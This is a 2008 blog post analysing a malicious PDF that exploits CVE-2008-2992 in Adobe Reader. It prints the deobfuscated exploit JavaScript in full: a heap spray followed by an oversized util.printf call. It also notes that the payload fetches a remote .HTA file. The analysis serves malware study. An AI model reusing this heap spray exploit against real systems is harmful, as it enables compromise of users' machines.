Monday, November 17, 2008

Static Analysis of Malicious PDF Exploited by CVE-2008-2992

There is an exploit in the wild on Adobe Reader CoreSecurity and after a few days the advisory released, the first POC was also released by Elazar on milw0rm. It took only one week for the first malware exploit spread over the Internet which is detected by F-Secure as Exploit:W32/APSB08-19.B

This is analysis that I have done on the malicious PDF file.

Target: doc1.pdf.1
MD5: 0f6af57c8ba2b3cdd9593223ca38e2de
SHA1: 93044e9484357e0de6c4dd618ded8beb2e43f878

One of the common technique for PDF decompression is using zlib. Not suprisingly, this sample was deflated using zlib as well:

We can easily inflate this contents using Ghostscript with file that comes with it. We can use the command below:

>gs -- "C:\Program Files\gs\toolbin\" doc1.pdf.1 out.pdf.1
GPL Ghostscript 8.50 (2005-12-31)
Copyright (C) 2005 artofcode LLC, Benicia, CA. All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Converting doc1.pdf.1 to out.pdf.1

You will see the similar output indicates the file has been inflated successfully. The inflated PDF contents:

The first screenshot shows the deobfuscated shellcode and the second one shows the obfuscated javascript. Obviously from the screenshot below, we know the deobfuscation can be done using "unescape" javascript method:

Using unescape function, we can easily convert the obfuscated code to readable javascript code:

var sccs = unescape(this.getField('text').value);
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000)
blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12; for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);
This javascript code uses heap spray technique for exploitation. This exploit is using a slightly different method from the POC in which the author uses the loop to concatenate to a large number that will overflow the util.printf(), unlike POC it uses a prdefined large number.

Shellcode2exe is used to convert the unicode shell into bytecode:

By using some debugging technique, we can find the payload where this exploits try to download an arbitrary .HTA file from the remote server

No comments: